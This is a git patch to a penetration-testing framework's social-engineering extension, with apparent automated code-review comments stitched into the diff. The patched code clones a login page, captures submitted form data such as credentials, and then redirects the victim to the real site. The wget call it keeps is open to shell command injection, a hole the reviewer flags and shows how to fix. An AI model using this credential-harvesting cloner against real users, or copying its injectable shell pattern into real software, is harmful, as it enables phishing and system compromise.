From 0260181d33fc7088b34a5b1101f0102f55c2f6ea Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Wed, 29 Aug 2012 19:33:14 +0100
Subject: [PATCH] Social Eng. extension: added redirection after POST interception, refactored Interceptor class
---
 .../web_cloner/interceptor.rb | 16 +++++----
 .../web_cloner/web_cloner.rb | 36 ++++---------------
 2 files changed, 15 insertions(+), 37 deletions(-)
diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb
index 7eba2ad46..af6a899cd 100644
--- a/extensions/social_engineering/web_cloner/interceptor.rb
+++ b/extensions/social_engineering/web_cloner/interceptor.rb
@@ -19,13 +19,13 @@ module BeEF
 class Interceptor < Sinatra::Base
- def initialize(file_path)
- super
- @config = BeEF::Core::Configuration.instance
- @cloned_page = ""
- File.open(file_path,'r').each do |line|
- @cloned_page += line
- end
+ def initialize(file_path, redirect_to)
+ super self
+ file = File.open(file_path,'r')
+ @cloned_page = file.read
+ @redirect_to = redirect_to
+ file.close
+ print_info "Cloned page using content from [cloned_pages/#{File.basename(file_path)}] initialized."
 end
 # intercept GET
@@ -44,6 +44,8 @@ module BeEF
 print_info "Intercepted data:"
 print_info data
+ redirect @redirect_to
+
 #todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present
 #todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user
 #todo: to the original page
diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index f962b4e90..1261f51c8 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
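Review bot: `file = File.open(file_path,'r')` followed by a manual `file.close` leaks the handle when `file.read` raises, and the three lines reduce to `@cloned_page = File.read(file_path)`, which closes the file on every path. `super self` forwards the interceptor itself as the first argument of `Sinatra::Base#initialize`; in the Sinatra versions I know that parameter is the downstream Rack app, so a `pass` from any route would call back into the same instance — `super()` with empty parentheses forwards nothing (the previous bare `super` forwarded `file_path`, which was wrong for the same reason). The assignment of `@config` is removed here; if any other method of Interceptor still reads `@config` it now gets nil, and the rest of the class is outside this hunk.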
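Review bot: `redirect @redirect_to` halts the request, so the three `#todo` comments now sit at a point no further code in this route can reach; the X-Frame-Options / framebusting check they describe would have to run before, and replace, the unconditional redirect, so move the comments above it or reword them. The POST route this hunk is inside starts outside the hunk, so I cannot see whether other statements after the todos became unreachable. `@redirect_to` is whatever `initialize` received; if it is not an absolute URL, Sinatra resolves it against the interceptor's own base URL, so rejecting a non-absolute value in `initialize` would make that failure visible at clone time rather than at the first intercepted POST.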
@@ -27,40 +27,16 @@ module BeEF
 end
 def clone_page(url)
- #todo see web_cloner.rb, work perfectly
- # output.html and output2.html (the one with the form action modified to /)
- # must be stored in cloned_pages
 print_info "Cloning page at URL #{url}"
 uri = URI(url)
-
- #output = url.split("/").last #todo test if http://google.com/ produces an error
 output = uri.host
 output_mod = "#{output}_mod"
-
 user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
- #todo: prevent Command Injection
- wget = "wget '#{url}' -O #{@cloned_pages_dir + output} --no-check-certificate -c -k -U '#{user_agent}'"
- IO.popen(wget.to_s) { |f| @result = f.gets }
- print_debug @result
- #todo, also check if the URL is valid with:
- #unless (url =~ URI::regexp).nil?
- # # Correct URL
- #end
-
- #todo: this should be the good way to prevent command injection, because the shell is not open.
- #todo: there are issues: Scheme missing when calling wget
- #wget_path = "wget"
- #env = {}
- #args = %W['#{url}' -O #{output} --no-check-certificate -c -k -U #{user_agent}]
- #IO.popen([env, wget_path, *args], 'r+') { |f| @result = f.gets }
-
-
- #if !File.writable?(File.basename(@cloned_pages_dir + output_mod))
- # print_info "Cannot write to file..."
- # IO.popen("chmod 777 #{@cloned_pages_dir}") { |f| @result = f.gets }
- # sleep 2
- #end
+ #todo: prevent command injection using IO.popen passing an array of arguments
+ # see here: http://devblog.avdi.org/2012/03/29/generating-cows-with-io-popen/
+ wget = "wget '#{url}' --no-check-certificate -c -k -U '#{user_agent}' -O #{@cloned_pages_dir + output}"
+ IO.popen(wget.to_s) { |f| result = f.gets }
 File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file|
 File.open("#{@cloned_pages_dir + output}", 'r').each do |line|
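Review bot: The new `wget = "wget '#{url}' ..."` line still interpolates `url` and `user_agent` into a shell command string that `IO.popen(wget.to_s)` hands to a shell, so a single quote in either value ends the quoting and the remainder is interpreted as shell syntax; the todo right above it names the fix, and the argv form of `IO.popen` is no more code than the string form, so there is no reason to leave it for later. The rewrite also drops `print_debug`, leaves `result` block-local and unused, and never checks wget's exit status, so a failed download is only noticed when the `File.open` on the output path raises ENOENT. Separately, `output = uri.host` is nil for a URL without a host and `@cloned_pages_dir + output` then raises TypeError, so a guard such as `raise ArgumentError, "URL has no host: #{url}" if uri.host.nil?` before running wget gives a clearer error. clone_page continues outside the hunk.
```ruby
        user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent')
        # argv form: IO.popen runs wget directly, so url and user_agent are never parsed by a shell
        wget = ['wget', url, '--no-check-certificate', '-c', '-k', '-U', user_agent,
                '-O', @cloned_pages_dir + output]
        result = IO.popen(wget) { |f| f.gets }
        print_debug result
        # $? is set by the block form of IO.popen once wget exits
        raise "wget failed for [#{url}]" unless $?.success?
        # … unchanged: rewriting the cloned HTML into output_mod …
```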
@@ -92,8 +68,8 @@ module BeEF
 print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]"
 file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
- @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path))
- print_info "Mounting cloned page on URL #{output}"
+ @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url))
+ print_info "Mounting cloned page on URL [/#{output}]"
 @http_server.remap
 end